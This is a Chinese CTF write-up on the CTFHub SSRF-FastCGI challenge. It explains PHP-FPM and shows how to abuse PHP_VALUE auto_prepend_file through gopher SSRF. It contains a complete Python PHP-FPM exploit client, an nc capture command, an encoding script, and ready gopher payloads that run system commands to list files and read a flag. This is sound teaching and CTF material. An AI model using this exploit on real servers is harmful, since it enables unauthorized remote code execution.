利用SSRF攻击内网FastCGI协议

0x01 FastCGI协议

这里我们还是以CTFHub中的技能树为例，进入CTFHub选择技能树，选择Web-SSRF-FastCGI协议就可以进入环境了。

这里开启环境后题目附件给了我们一篇文章，可以让我们来参考。

文章链接：https://blog.csdn.net/mysteryflower/article/details/94386461

什么是FastCGI

Fastcgi就是一个通信协议，相比HTTP协议，HTTP是浏览器与服务器中间件进行数据交换的协议，而FastCGI就是服务器中间件与某个语言后端进行数据交换的协议。

它与HTTP协议一样也有自己特定的格式，这里需要注意的是数据包中也有header和body一说。关于其他具体的格式个人感觉也不用了解的太具体，因为数据包中有很多不可见的字符，就算我们完全了解了也不太可能去手打payload。所以这里就不多介绍了，如果有兴趣可以去文章中具体了解。

什么是PHP-FPM

官方对它的解释是FPM（FastCGI 进程管理器）用于替换 PHP FastCGI 的大部分附加功能，对于高负载网站是非常有用的。

也就是说php-fpm是FastCGI的一个具体实现，并且提供了进程管理的功能，在其中的进程中，包含了master和worker进程，这个在后面我们进行环境搭建的时候可以通过命令查看。其中master 进程负责与 Web 服务器进行通信，接收 HTTP 请求，再将请求转发给 worker 进程进行处理，worker 进程主要负责动态执行 PHP 代码，处理完成后，将处理结果返回给 Web 服务器，再由 Web 服务器将结果发送给客户端。

简单来说FPM就是一个FastCGI的解析器，服务器中间件将用户的请求按照FastCGI的规则打包后就是传给了FPM，然后按照用户的请求解析对应的文件。

借用文章中的例子，用户访问http://127.0.0.1/index.php?a=1&b=2，如果web目录是/var/www/html，那么Nginx会将这个请求变成如下key-value对：

{ 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'GET', 'SCRIPT_FILENAME': '/var/www/html/index.php', 'SCRIPT_NAME': '/index.php', 'QUERY_STRING': '?a=1&b=2', 'REQUEST_URI': '/index.php?a=1&b=2', 'DOCUMENT_ROOT': '/var/www/html', 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '12345', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1' }

具体的这几个概念之间的关系，可以看下面的图来帮助大家理解。

攻击原理

至于攻击的原理那么就很简单了，PHP-FPM默认监听的端口是9000，一般情况会只会接受127.0.0.1也就是本地的请求。但是如果配置不当让这个端口暴露在公网之中，我们就可以按照FastCGI的规则，自己构造数据包与FPM通信。当然如果没有配置错误我们就需要通过SSRF来利用服务器做跳板来攻击了。

这里就就牵扯到了FPM接收数据包中的一个值了：SCRIPT_FILENAME，这个值指向的就是要执行的文件，只要我们自己构造这个值，就可以执行任意PHP文件。

在FPM某个版本前我们可以指定任意后缀的文件，比如：/etc/passwd。但后来，fpm的默认配置中增加了一个选项 security.limit_extensions ，其限定了只有某些后缀的文件允许被fpm执行，默认是.php。所以，当我们再传入/etc/passwd的时候，将会返回 Access denied. 。所以我们只能执行服务器上现有的PHP文件。

任意代码执行

那么我们要如何才能执行任意代码呢？

这里又涉及到了PHP的配置项，auto_prepend_file和auto_append_file，这两个配置项我在之前的关于文件上传的文章中，.user.ini文件也提到了这两个配置项。这里就再回顾一下这两个配置项的作用。

auto_append_file #在执行php文件后自动包含一个指定文件 auto_prepend_file #在执行php文件前自动包含一个指定文件

那么，我们设置 auto_prepend_file 为 php://input ，（需要注意同样也要配置远程文件包含选项 allow_url_include ）那么就等于在执行任何php文件前都要包含一遍POST的内容。那么我们只要将要执行的代码放在body中，就可以执行任意的代码了。

那么我们要怎么设置我们想要配置的值呢，这又涉及到发给PHP-FPM数据包中的另两个值，PHP_VALUE 和 PHP_ADMIN_VALUE 。这两个环境变量就是用来设置PHP配置项的，PHP_VALUE 可以设置模式为 PHP_INI_USER 和 PHP_INI_ALL 的选项，PHP_ADMIN_VALUE 可以设置所有选项。

所以我们配置 PHP_VALUE 为 auto_prepend_file=php://input ， PHP_ADMIN_VALUE 为 allow_url_include=On 然后将我们需要执行的代码放在Body中，即可执行任意代码。

0x02 搭建本地环境

由于CTFHub中的环境开启后只有30分钟，而且每次开启环境或者续期环境都需要花费对金币，对于不富裕的小伙伴可能比较有心理负担，可以考虑在本地搭建环境方便自己试验，理解原理后在直接在CTFHub中试验结果。同样搭建环境的过程也能够帮助了解PFM的配置方式，以及未授权访问PFM的原理。

所以如果想要自己搭建环境可以参考这篇文章，文章中讲的很详细，我在这里就不再介绍了。

文章链接：https://bbs.ichunqiu.com/thread-58455-1-1.html

0x03 CTFHub-SSRF-FastCGI实践

上面已经了解了攻击的原理，那么剩下的就很简单了，直接利用exp攻击就可以了。

题目中给的参考文章里的exp链接打不开了，这里就借用另一篇文章中的exp了。

文章链接：https://blog.csdn.net/rfrder/article/details/108589988

import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2=True if sys.version_info.major==2 else False def bchr(i): if PY2: return force_bytes(chr(i)) else: return bytes([i]) def bord(c): if isinstance(c, int): return c else: return ord(c) def force_bytes(s): if isinstance(s, bytes): return s else: return s.encode('utf-8', 'strict') def force_text(s): if issubclass(type(s), str): return s if isinstance(s, bytes): s=str(s, 'utf-8', 'strict') else: s=str(s) return s class FastCGIClient: """A Fast-CGI Client for Python""" # private __FCGI_VERSION=1 __FCGI_ROLE_RESPONDER=1 __FCGI_ROLE_AUTHORIZER=2 __FCGI_ROLE_FILTER=3 __FCGI_TYPE_BEGIN=1 __FCGI_TYPE_ABORT=2 __FCGI_TYPE_END=3 __FCGI_TYPE_PARAMS=4 __FCGI_TYPE_STDIN=5 __FCGI_TYPE_STDOUT=6 __FCGI_TYPE_STDERR=7 __FCGI_TYPE_DATA=8 __FCGI_TYPE_GETVALUES=9 __FCGI_TYPE_GETVALUES_RESULT=10 __FCGI_TYPE_UNKOWNTYPE=11 __FCGI_HEADER_SIZE=8 # request state FCGI_STATE_SEND=1 FCGI_STATE_ERROR=2 FCGI_STATE_SUCCESS=3 def __init__(self, host, port, timeout, keepalive): self.host=host self.port=port self.timeout=timeout if keepalive: self.keepalive=1 else: self.keepalive=0 self.sock=None self.requests=dict() def __connect(self): self.sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # if self.keepalive: # self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1) # else: # self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0) try: self.sock.connect((self.host, int(self.port))) except socket.error as msg: self.sock.close() self.sock=None print(repr(msg)) return False return True def __encodeFastCGIRecord(self, fcgi_type, content, requestid): length=len(content) buf=bchr(FastCGIClient.__FCGI_VERSION) \ + bchr(fcgi_type) \ + bchr((requestid >> 8) & 0xFF) \ + bchr(requestid & 0xFF) \ + bchr((length >> 8) & 0xFF) \ + bchr(length & 0xFF) \ + bchr(0) \ + bchr(0) \ + content return buf def __encodeNameValueParams(self, name, value): nLen=len(name) vLen=len(value) record=b'' if nLen < 128: record +=bchr(nLen) else: record +=bchr((nLen >> 24) | 0x80) \ + bchr((nLen >> 16) & 0xFF) \ + bchr((nLen >> 8) & 0xFF) \ + bchr(nLen & 0xFF) if vLen < 128: record +=bchr(vLen) else: record +=bchr((vLen >> 24) | 0x80) \ + bchr((vLen >> 16) & 0xFF) \ + bchr((vLen >> 8) & 0xFF) \ + bchr(vLen & 0xFF) return record + name + value def __decodeFastCGIHeader(self, stream): header=dict() header['version']=bord(stream[0]) header['type']=bord(stream[1]) header['requestId']=(bord(stream[2]) << 8) + bord(stream[3]) header['contentLength']=(bord(stream[4]) << 8) + bord(stream[5]) header['paddingLength']=bord(stream[6]) header['reserved']=bord(stream[7]) return header def __decodeFastCGIRecord(self, buffer): header=buffer.read(int(self.__FCGI_HEADER_SIZE)) if not header: return False else: record=self.__decodeFastCGIHeader(header) record['content']=b'' if 'contentLength' in record.keys(): contentLength=int(record['contentLength']) record['content'] +=buffer.read(contentLength) if 'paddingLength' in record.keys(): skiped=buffer.read(int(record['paddingLength'])) return record def request(self, nameValuePairs={}, post=''): if not self.__connect(): print('connect failure! please check your fasctcgi-server !!') return requestId=random.randint(1, (1 << 16) - 1) self.requests[requestId]=dict() request=b"" beginFCGIRecordContent=bchr(0) \ + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \ + bchr(self.keepalive) \ + bchr(0) * 5 request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN, beginFCGIRecordContent, requestId) paramsRecord=b'' if nameValuePairs: for (name, value) in nameValuePairs.items(): name=force_bytes(name) value=force_bytes(value) paramsRecord +=self.__encodeNameValueParams(name, value) if paramsRecord: request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId) request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId) if post: request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId) request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId) self.sock.send(request) self.requests[requestId]['state']=FastCGIClient.FCGI_STATE_SEND self.requests[requestId]['response']=b'' return self.__waitForResponse(requestId) def __waitForResponse(self, requestId): data=b'' while True: buf=self.sock.recv(512) if not len(buf): break data +=buf data=BytesIO(data) while True: response=self.__decodeFastCGIRecord(data) if not response: break if response['type']==FastCGIClient.__FCGI_TYPE_STDOUT \ or response['type']==FastCGIClient.__FCGI_TYPE_STDERR: if response['type']==FastCGIClient.__FCGI_TYPE_STDERR: self.requests['state']=FastCGIClient.FCGI_STATE_ERROR if requestId==int(response['requestId']): self.requests[requestId]['response'] +=response['content'] if response['type']==FastCGIClient.FCGI_STATE_SUCCESS: self.requests[requestId] return self.requests[requestId]['response'] def __repr__(self): return "fastcgi connect host:{} port:{}".format(self.host, self.port) if __name__=='__main__': parser=argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.') parser.add_argument('host', help='Target host, such as 127.0.0.1') parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php') parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>') parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int) args=parser.parse_args() client=FastCGIClient(args.host, args.port, 3, 0) params=dict() documentRoot="/" uri=args.file content=args.code params={ 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'POST', 'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'), 'SCRIPT_NAME': uri, 'QUERY_STRING': '', 'REQUEST_URI': uri, 'DOCUMENT_ROOT': documentRoot, 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '9985', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1', 'CONTENT_TYPE': 'application/text', 'CONTENT_LENGTH': "%d" % len(content), 'PHP_VALUE': 'auto_prepend_file=php://input', 'PHP_ADMIN_VALUE': 'allow_url_include=On' } response=client.request(params, content)

这里我们要先用NC来监听一下端口，并把流量记录在文件中，用来接收我们的攻击流量。

命令：nc -lvvp [端口] > [文件名]

然后运行我们的exp脚本：

命令：python [脚本名] -c [要执行的代码] -p [端口号] [ip] [要执行的php文件]

这里我用的虚拟机监听，所以IP是填写我虚拟机的ip地址，后面要执行的php文件是因为要先执行一个现有的php文件才能再去包含我们要执行的代码。CTFHub环境中我们一开始访问的就是index.php，web目录一般就在 /var/www/html 这个文件夹下。实际环境中应该很好找到现有的php文件，如果实在找不到，也可以尝试以下方法：通常使用源安装php的时候，服务器上也都会附带一些php后缀的文件，假设我们爆破不出来目标环境的web目录，我们可以找找默认源安装后可能存在的php文件，比如 /usr/local/lib/php/PEAR.php。

运行完攻击的exp后我们再来看看接收到的攻击流量。流量中有很多不可打印字符，打开可能会乱码，我们可以通过hexdump命令来查看：

这里我们还需要对流量进行url编码，在利用另一个python脚本。

# -*- coding: UTF-8 -*- fromurllib.parseimportquote, unquote, urlencode file=open('1.txt','rb') payload=file.read() payload=quote(payload).replace("%0A","%0A%0D") print("gopher://127.0.0.1:9000/_"+quote(payload))

这个脚本可以直接帮我们将流量进行两次url编码，直接变成我们可以利用的payload。生成的payload如下：

gopher://127.0.0.1:9000/_%2501%2501T%259E%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504T%259E%2501%25DB%2500%2500%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250E%2504REQUEST_METHODPOST%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%250C%2500QUERY_STRING%250B%2517REQUEST_URI/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250B%2504REMOTE_PORT9985%250B%2509SERVER_ADDR127.0.0.1%250B%2502SERVER_PORT80%250B%2509SERVER_NAMElocalhost%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH23%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%2501%2504T%259E%2500%2500%2500%2500%2501%2505T%259E%2500%2517%2500%2500%253C%253Fphp%2520system%2528%2527ls%2520/%2527%2529%253B%253F%253E%2501%2505T%259E%2500%2500%2500%2500

我们直接将payload放到 ?url=参数后面访问：

我们可以看到虽然页面出现了一定的乱码，但是我们还是可以看到成功执行了命令，并展示出了根目录下的文件，我们可以观察到其中就有 flag_052c3b0c46ee677f6f63b629f7f314a1 这个文件，我们在更改执行的命令在来一遍。

监听端口，然后执行exp，不过这次的命令是：

python Attack.py -c "<?php system('cat /flag_052c3b0c46ee677f6f63b629f7f314a1');?>" -p 9000 192.168.48.129 /var/www/html/index.php

使用脚本进行URL编码，最终payload如下：

gopher://127.0.0.1:9000/_%2501%2501%259AP%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%259AP%2501%25DB%2500%2500%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250E%2504REQUEST_METHODPOST%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%250C%2500QUERY_STRING%250B%2517REQUEST_URI/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250B%2504REMOTE_PORT9985%250B%2509SERVER_ADDR127.0.0.1%250B%2502SERVER_PORT80%250B%2509SERVER_NAMElocalhost%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH61%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%2501%2504%259AP%2500%2500%2500%2500%2501%2505%259AP%2500%253D%2500%2500%253C%253Fphp%2520system%2528%2527cat%2520/flag_052c3b0c46ee677f6f63b629f7f314a1%2527%2529%253B%253F%253E%2501%2505%259AP%2500%2500%2500%2500

再次访问：

成功拿到flag。